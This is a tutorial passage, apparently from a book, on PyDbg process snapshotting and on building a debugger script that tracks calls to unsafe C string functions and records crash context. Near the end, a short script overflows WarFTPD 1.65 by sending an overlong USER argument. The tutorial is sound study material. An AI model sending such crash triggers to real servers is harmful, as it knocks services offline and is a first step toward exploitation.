PyDbg comes stocked with a very cool feature called process snapshotting. Using process snapshotting you can freeze a process, obtain all of its memory, and resume the process. At any later time you can revert the process to the state it was in when the snapshot was taken. This can be quite handy when reverse engineering a binary or analyzing a crash.
Our first step is to get an accurate picture of what the target process was up to at a precise moment. In order for the picture to be accurate, we need to first obtain all threads and their respective CPU contexts. As well, we need to obtain all of the process's memory pages and their contents. Once we have this information, it's just a matter of storing it for when we want to restore a snapshot.
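To make that concrete, here is a minimal sketch, separate from the example we will build shortly, that enumerates a target's threads and grabs each one's CPU context; this is the per-thread half of what PyDbg's snapshotting collects for us. The PID prompt and the registers printed are just for illustration.

from pydbg import *
from pydbg.defines import *

dbg = pydbg()
dbg.attach(int(raw_input("Enter the PID to inspect: ")))

# Threads must be suspended before their contexts can be read reliably
dbg.suspend_all_threads()

# Walk every thread in the process and capture its CPU context,
# the same per-thread state a snapshot has to record
for thread_id in dbg.enumerate_threads():
    thread_handle = dbg.open_thread(thread_id)
    context       = dbg.get_thread_context(thread_handle)
    print "[*] TID: %d EIP: 0x%08x ESP: 0x%08x" % (thread_id, context.Eip, context.Esp)
    dbg.close_handle(thread_handle)

dbg.resume_all_threads()
dbg.detach()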
Before we can take a process snapshot, we have to suspend all threads of execution so that they don't change data or state while the snapshot is being taken. To suspend all threads in PyDbg, we use suspend_all_threads(), and to resume all the threads, we use the aptly named resume_all_threads(). Once we have suspended the threads, we simply make a call to process_snapshot(). This automatically fetches all of the contextual information about each thread and all memory at that precise moment. Once the snapshot is finished, we resume all of the threads. When we want to restore the process to the snapshot point, we suspend all of the threads, call process_restore(), and resume all of the threads. Once we resume the process, we should be back at our original snapshot point. Pretty neat, eh?
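In code, the whole cycle boils down to a few calls. Here is a minimal sketch, assuming dbg is a pydbg instance already attached to the target:

# Take the snapshot
dbg.suspend_all_threads()      # freeze every thread so state can't change
dbg.process_snapshot()         # record all thread contexts and memory
dbg.resume_all_threads()       # let the target keep running

# ... some time later, rewind to the snapshot point ...
dbg.suspend_all_threads()
dbg.process_restore()          # put memory and thread contexts back
dbg.resume_all_threads()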
To try this out, let's use a simple example where the user types a command to take a snapshot and types another command to restore it. Open a new Python file, call it snapshot.py, and enter the following code.
from pydbg import *
from pydbg.defines import *

import threading
import time
import sys

class snapshotter(object):

    def __init__(self, exe_path):

        self.exe_path = exe_path
        self.pid      = None
        self.dbg      = None
        self.running  = True

        # Start the debugger thread, and loop until it sets the PID
        # of our target process
        pydbg_thread = threading.Thread(target=self.start_debugger)
        pydbg_thread.setDaemon(0)
        pydbg_thread.start()

        while self.pid == None:
            time.sleep(1)

        # We now have a PID and the target is running; let's get a
        # second thread running to do the snapshots
        monitor_thread = threading.Thread(target=self.monitor_debugger)
        monitor_thread.setDaemon(0)
        monitor_thread.start()

    def monitor_debugger(self):

        while self.running == True:

            input = raw_input("Enter: 'snap','restore' or 'quit'")
            input = input.lower().strip()

            if input == "quit":
                print "[*] Exiting the snapshotter."
                self.running = False
                self.dbg.terminate_process()
            elif input == "snap":
                print "[*] Suspending all threads."
                self.dbg.suspend_all_threads()

                print "[*] Obtaining snapshot."
                self.dbg.process_snapshot()

                print "[*] Resuming operation."
                self.dbg.resume_all_threads()
            elif input == "restore":
                print "[*] Suspending all threads."
                self.dbg.suspend_all_threads()

                print "[*] Restoring snapshot."
                self.dbg.process_restore()

                print "[*] Resuming operation."
                self.dbg.resume_all_threads()

    def start_debugger(self):

        self.dbg = pydbg()
        self.dbg.load(self.exe_path)

        self.pid = self.dbg.pid
        self.dbg.run()

exe_path = "C:\\WINDOWS\\System32\\calc.exe"

snapshotter(exe_path)
So the first step is to start the target application under a debugger thread. By using separate threads, we can enter snapshotting commands without forcing the target application to pause while it waits for our input. Once the debugger thread has returned a valid PID, we start up a new thread that will take our input. Then when we send it a command, it evaluates whether we are taking a snapshot, restoring a snapshot, or quitting. Pretty straightforward. The reason I picked Calculator as an example application is that we can actually see this snapshotting process in action. Enter a bunch of random math operations into the calculator, enter snap into our Python script, and then do some more math or hit the Clear button. Then simply type restore into our Python script, and you should see the numbers revert to our original snapshot point! Using this technique, you can walk through and rewind parts of a process that interest you without having to restart the process and coax it back into that exact state. Now let's combine some of our new PyDbg techniques to create a fuzzing assistance tool that will help us find vulnerabilities in software applications and automate crash handling.
Now that we have covered some of the most useful features of PyDbg, we will build a utility program to help root out (pun intended) exploitable flaws in software applications. Certain function calls are more prone than others to introducing buffer overflows, format string vulnerabilities, and memory corruption. We want to pay particular attention to these dangerous functions.
The tool will locate the dangerous function calls and track hits to those functions. When a function we have deemed dangerous gets called, we will dereference the first few parameters off the stack (as well as the caller's return address) and snapshot the process in case that function causes an overflow condition. If there is an access violation, our script will rewind the process to the last dangerous function hit. From there it single-steps the target application and disassembles each instruction until we either throw the access violation again or hit the maximum number of instructions we want to inspect. Anytime you see a hit on a dangerous function that matches data you have sent to the application, it is worth investigating whether you can manipulate that data to crash the application. This is the first step toward creating an exploit.
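Before we dive into the full script, it helps to see the core stack-reading trick in isolation. On x86, at the moment a breakpoint on a function's first instruction fires, [ESP] holds the caller's return address and the parameters sit just above it. Here is a minimal sketch of such a breakpoint handler, separate from the tool below; the handler name is just for illustration, and smart_dereference() does the work of rendering each value sensibly.

# Sketch of reading stack parameters inside a PyDbg breakpoint handler.
# At function entry on x86, [ESP] is the caller's return address and
# [ESP+4], [ESP+8], ... are the parameters.
def stack_peek_handler(dbg):

    # Read the raw return address dword and flip it into native order
    return_address = dbg.flip_endian_dword(
        dbg.read_process_memory(dbg.context.Esp, 4))
    print "[*] Called from: 0x%08x" % return_address

    # smart_dereference() renders each value as a string, a printable
    # dword, or raw bytes, whichever makes the most sense
    for offset in range(4, 20, 4):
        print "[ESP + %d] => %s" % (offset,
            dbg.smart_dereference(dbg.context.Esp + offset))

    return DBG_CONTINUE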
Warm up your coding fingers, open a new Python script called danger_track.py, and enter the following code.
from pydbg import *
from pydbg.defines import *

import utils

# This is the maximum number of instructions we will log
# after an access violation
MAX_INSTRUCTIONS = 10

# This is far from an exhaustive list; add more for bonus points
dangerous_functions = {
    "strcpy"  : "msvcrt.dll",
    "strncpy" : "msvcrt.dll",
    "sprintf" : "msvcrt.dll",
    "vsprintf": "msvcrt.dll"
}

dangerous_functions_resolved = {}
crash_encountered            = False
instruction_count            = 0

def danger_handler(dbg):

    # We want to print out the contents of the stack; that's about it
    # Generally there are only going to be a few parameters, so we will
    # take everything from ESP to ESP+20, which should give us enough
    # information to determine if we own any of the data
    esp_offset = 0
    print "[*] Hit %s" % dangerous_functions_resolved[dbg.context.Eip]
    print "================================================================="

    while esp_offset <= 20:
        parameter = dbg.smart_dereference(dbg.context.Esp + esp_offset)
        print "[ESP + %d] => %s" % (esp_offset, parameter)
        esp_offset += 4

    print "=================================================================\n"

    dbg.suspend_all_threads()
    dbg.process_snapshot()
    dbg.resume_all_threads()

    return DBG_CONTINUE

def access_violation_handler(dbg):

    global crash_encountered

    # Something bad happened, which means something good happened :)
    # Let's handle the access violation and then restore the process
    # back to the last dangerous function that was called
    if dbg.dbg.u.Exception.dwFirstChance:
        return DBG_EXCEPTION_NOT_HANDLED

    crash_bin = utils.crash_binning.crash_binning()
    crash_bin.record_crash(dbg)
    print crash_bin.crash_synopsis()

    if crash_encountered == False:
        dbg.suspend_all_threads()
        dbg.process_restore()
        crash_encountered = True

        # We flag each thread to single step
        for thread_id in dbg.enumerate_threads():
            print "[*] Setting single step for thread: 0x%08x" % thread_id
            h_thread = dbg.open_thread(thread_id)
            dbg.single_step(True, h_thread)
            dbg.close_handle(h_thread)

        # Now resume execution, which will pass control to our
        # single step handler
        dbg.resume_all_threads()
        return DBG_CONTINUE
    else:
        dbg.terminate_process()

    return DBG_EXCEPTION_NOT_HANDLED

def single_step_handler(dbg):

    global instruction_count
    global crash_encountered

    if crash_encountered:
        if instruction_count == MAX_INSTRUCTIONS:
            dbg.single_step(False)
            return DBG_CONTINUE
        else:
            # Disassemble this instruction
            instruction = dbg.disasm(dbg.context.Eip)
            print "#%d\t0x%08x : %s" % (instruction_count, dbg.context.Eip,
                                        instruction)
            instruction_count += 1
            dbg.single_step(True)

    return DBG_CONTINUE

dbg = pydbg()
pid = int(raw_input("Enter the PID you wish to monitor: "))

dbg.attach(pid)

# Track down all of the dangerous functions and set breakpoints
for func in dangerous_functions.keys():

    func_address = dbg.func_resolve(dangerous_functions[func], func)
    print "[*] Resolved breakpoint: %s -> 0x%08x" % (func, func_address)
    dbg.bp_set(func_address, handler=danger_handler)
    dangerous_functions_resolved[func_address] = func

dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, access_violation_handler)
dbg.set_callback(EXCEPTION_SINGLE_STEP, single_step_handler)

dbg.run()
There should be no big surprises in the preceding code block, as we have covered most of the concepts in our previous PyDbg endeavors. The best way to test the effectiveness of this script is to pick a software application that is known to have a vulnerability,[26] attach the script, and then send the required input to crash the application.
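For example, a quick way to exercise the WarFTPD 1.65 bug mentioned in the footnote is to hand the server an overly long argument to the USER command. The following is a rough sketch, not part of the tool itself; the target address and buffer length are assumptions you will need to adjust for your own test setup.

# Hedged sketch: trigger the classic WarFTPD 1.65 stack overflow by
# sending an overly long USER argument. Adjust target and length to
# match your lab environment.
import socket

target  = "192.168.1.100"   # assumption: IP of the machine running WarFTPD
port    = 21
payload = "A" * 1000        # assumption: long enough to smash the stack

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
print s.recv(1024)          # grab the FTP banner

s.send("USER %s\r\n" % payload)
print s.recv(1024)
s.close()

With danger_track.py attached to the WarFTPD process, sending this buffer should light up the dangerous-function breakpoints and, once the access violation fires, produce the single-step disassembly trail.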
We have taken a solid tour of PyDbg and a subset of the features it provides. As you can see, the ability to script a debugger is extremely powerful and lends itself well to automation tasks. The only downside to this method is that for every piece of information you wish to obtain, you have to write code to do it. This is where our next tool, Immunity Debugger, bridges the gap between a scripted debugger and a graphical debugger you can interact with. Let's carry on.
[26] A classic stack-based overflow can be found in WarFTPD 1.65. You can still download this FTP server from http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1.